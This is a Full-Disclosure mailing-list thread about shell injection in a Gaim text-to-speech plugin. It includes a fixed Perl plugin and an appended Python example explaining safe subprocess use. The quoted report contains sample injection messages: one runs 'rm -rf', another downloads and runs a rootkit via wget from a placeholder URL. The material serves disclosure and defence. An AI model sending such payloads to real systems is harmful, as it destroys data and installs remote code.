
[Full-Disclosure] Re: Gaim festival plugin exploit

DUH... would help if I attached my attachment.

I am right proud of myself for this, and it also needs mention to
address the security issue that our friend Error (is that a reference to
Zelda 2?) raised.

Attached, find the latest reissue of the Gaim festival plugin.  The guy
that wrote it wrote it for the pre-0.68 Perl API, but it was secure against
the sort of attack that Error described.  I have since taken it and
recoded it to work with post-0.68 versions of Gaim.  It is attached.  By
all means, if you see an exploitable bug in there, let me know!  I'm
just a perl-tot.


On Wed, 2003-10-15 at 11:29, error wrote:
> It has come to my attention that people have actually used this example
> code for a gaim plugin:
> AIM::register("Festival TTS", "0.0.1", "goodbye", "");
> AIM::print("Perl Says", "Loaded Festival TTS");
> AIM::command("idle", "60000") if ($pro ne "Offline");
> AIM::add_event_handler("event_im_recv", "synthesize");
> sub goodbye {
>       AIM::print("Module Unloaded", "Unloaded Festival TTS");
> }
> sub synthesize {
>     my $string = $_[0];
>     $string =~ s/\<.*?\>//g;
>     $string =~ s/\".*\"//;
>     system("echo \"$string\" | /usr/bin/festival --tts");
> }
> As taken from:
> http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
> This has to be one of the most amusing ways to gain a local user's
> privileges I have ever seen by an "Expert (TM)"
> Exploit code?
> You have a shell through gaim with that.
> Just pass it this message (or really any message for that matter):
> Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
> Or perhaps:
> Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
> rootkit;./rootkit
> Perhaps someone should ask:
> "(Is s/[^\w]//g really that hard to do?!)"
> So a fixed version would look like this:
> AIM::register("Festival TTS", "0.0.1", "goodbye", "");
> AIM::print("Perl Says", "Loaded Festival TTS");
> AIM::command("idle", "60000") if ($pro ne "Offline");
> AIM::add_event_handler("event_im_recv", "synthesize");
> sub goodbye {
>       AIM::print("Module Unloaded", "Unloaded Festival TTS");
> }
> sub synthesize {
>     my $string = $_[0];
>     $string =~ s/\<.*?\>//g;
>     $string =~ s/\".*\"//;
>     $string =~ s/[^\w]//g;
>     system("echo \"$string\" | /usr/bin/festival --tts");
> }
> Just a minor comment, nothing special.
HCTITS Security Division <security@humancentrictech.com>
HumanCentric Technologies

# gabfest.pl
# updated by Brian Henning <brian@cheetah.dynip.com>
# License: GPL
# Based upon:
# By:  Matt Davis <agent@sdf.lonestar.org>
# Screen Name:  dasmittel
# License:  GPL
# This is a perl plugin written for GAIM version 0.11
# It will make festival read your incoming messages to you
# after stripping out any html tags that the windows clients send
# The fork allows the message to be displayed as it is being said.  If
# system was used, the message would not display until after festival was
# done saying it.
# The text is written to festival's standard input through a list-form
# pipe open, so /bin/sh never parses the message and no character in it
# can turn into a command (see say_in_background below).

use strict;
use warnings;
use POSIX ();
use Gaim;

our %PLUGIN_INFO = (
        perl_api_version => 2,
        name             => "GabFest",
        version          => "0.5",
        summary          => "Uses Festival to read incoming instant messages",
        description      => "There's nothing more to say about this plugin.",
        author           => "Matt Davis, recoded by Brian Henning",
        url              => "",
        load             => "plugin_load",
        unload           => "plugin_unload"
);

sub plugin_init {
        return %PLUGIN_INFO;
}

sub plugin_load {
        my $plugin = shift;
        Gaim::signal_connect(Gaim::Conversations::handle(), "received-im-msg",
                             $plugin, \&festival_say, 0);
#       Gaim::signal_connect($plugin, Gaim::Conversation, "received-im-msg",
        say_in_background("Gabfest has loaded");
        Gaim::print("Meaningless Drivel", "The damn thing is loaded, not that "
                    . "it does any good.");
}

sub plugin_unload {
        my $plugin = shift;
        Gaim::print("GabFest", "GabFest has unloaded.");
}

# Fork, then feed $text to festival on its standard input.  The list form
# of open() runs festival directly (no shell), so the text is data only,
# whatever quotes, semicolons or backticks it contains.  The child leaves
# through _exit so Gaim's END blocks and destructors do not run twice.
sub say_in_background {
        my ($text) = @_;
        my $pid = fork;
        return unless defined $pid && $pid == 0;   # parent, or fork failed
        if (open(my $tts, '|-', 'artsdsp', 'festival', '-b', '--tts')) {
                print $tts "$text\n";
                close $tts;
        }
        POSIX::_exit(0);
}

sub festival_say {
        my ($gc, $sendername, $message, $flags) = @_;
        my $text = $message;
        $text =~ s/<(?:[^>\'\"]*|([\'\"]).*?\1)*>//gs;  # Parse out most HTML.  See note 1.
        if ($text ne "") {
                say_in_background("$sendername said, $text");
        } else {
                say_in_background("The function was called, but there was "
                                  . "apparently nothing to say");
        }
        return 0;
}

#--- Note 1.  This section was taken from the URL below
#--- Thanks guys.
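The thread's point is that deleting quote characters does nothing about the other characters the shell treats as syntax, and that the real fix is to keep the shell out of the path altogether. The following is an added example, not part of the mailing-list post or of the gabfest.pl attachment: it ports the attachment's two-step sanitizer (HTML strip, then quote removal) to Python, reports which shell metacharacters survive it, and then shows the two safe delivery patterns (argv list with the text on stdin, or `shlex.quote` when a pipeline is unavoidable). The sample messages are constructed, and `cat` stands in for `artsdsp festival -b --tts` so the result can be checked offline.

```python
"""Why stripping quotes does not stop shell injection, and how to hand an
instant message to a text-to-speech program without a shell in between.

Added example, not part of the mailing-list post or of gabfest.pl.  The
sanitizer below is a port of the attachment's two steps (HTML strip, then
quote removal); `cat` stands in for `artsdsp festival -b --tts` so the
output can be checked offline.  The sample messages are constructed."""
import re
import shlex
import subprocess

# Characters /bin/sh treats as syntax.  None of them is removed by the
# plugin's filter, which only deletes ' and ".
SHELL_META = set(";|&$`<>()\n")

# Constructed samples.  The second has the shape the thread describes:
# a quote to end the echo argument, then a second command.
INNOCENT = "<b>hello</b> there"
HOSTILE = 'hello"; echo injected > /tmp/proof; echo "'


def strip_like_gabfest(message):
    """Port of the attachment's sanitizer: remove HTML tags, then delete
    single and double quotes.  Everything else is passed through."""
    message = re.sub(r"<(?:[^>'\"]*|(['\"]).*?\1)*>", "", message, flags=re.S)
    return message.replace("'", "").replace('"', "")


def leaked_metacharacters(text):
    """Shell metacharacters still present after filtering.  A non-empty
    list means a string-form exec() would let the shell run part of the
    message as a command."""
    return sorted(c for c in set(text) if c in SHELL_META)


def unsafe_command_line(sender, message):
    """The string that exec("echo $sendername said, $message | ...") hands
    to /bin/sh.  Returned for inspection, never executed here."""
    return f"echo {sender} said, {strip_like_gabfest(message)} | artsdsp festival -b --tts"


def speak_safely(sender, message, tts_argv=("cat",)):
    """Run the TTS program from a fixed argv list and write the text to its
    stdin.  No shell is involved, so the message is data whatever it
    contains.  Returns what the program read (cat echoes it back)."""
    text = f"{sender} said, {strip_like_gabfest(message)}\n"
    done = subprocess.run(list(tts_argv), input=text, capture_output=True,
                          text=True, check=True)
    return done.stdout


def quoted_pipeline(sender, message, tts_command="artsdsp festival -b --tts"):
    """Fallback when a shell pipeline is unavoidable: shlex.quote turns the
    text into one single-quoted word, so ; | $ and friends stay literal."""
    text = f"{sender} said, {strip_like_gabfest(message)}"
    return f"printf '%s\\n' {shlex.quote(text)} | {tts_command}"


def run_quoted_pipeline(sender, message):
    """Execute quoted_pipeline() with cat in place of festival."""
    done = subprocess.run(quoted_pipeline(sender, message, "cat"), shell=True,
                          capture_output=True, text=True, check=True)
    return done.stdout


if __name__ == "__main__":
    for msg in (INNOCENT, HOSTILE):
        stripped = strip_like_gabfest(msg)
        print(repr(msg), "->", repr(stripped),
              "leaks:", leaked_metacharacters(stripped))
    print(unsafe_command_line("alice", HOSTILE))
    print(speak_safely("alice", HOSTILE), end="")
    print(run_quoted_pipeline("alice", HOSTILE), end="")
```

Run it and the hostile sample comes back from `cat` byte for byte, semicolons included: once the message travels over stdin to a program started from a fixed argv, there is nothing left for it to inject into. `leaked_metacharacters` is the check to keep around when reviewing any filter that feeds a shell; if it ever returns a non-empty list for input the filter accepted, the filter is not the defence.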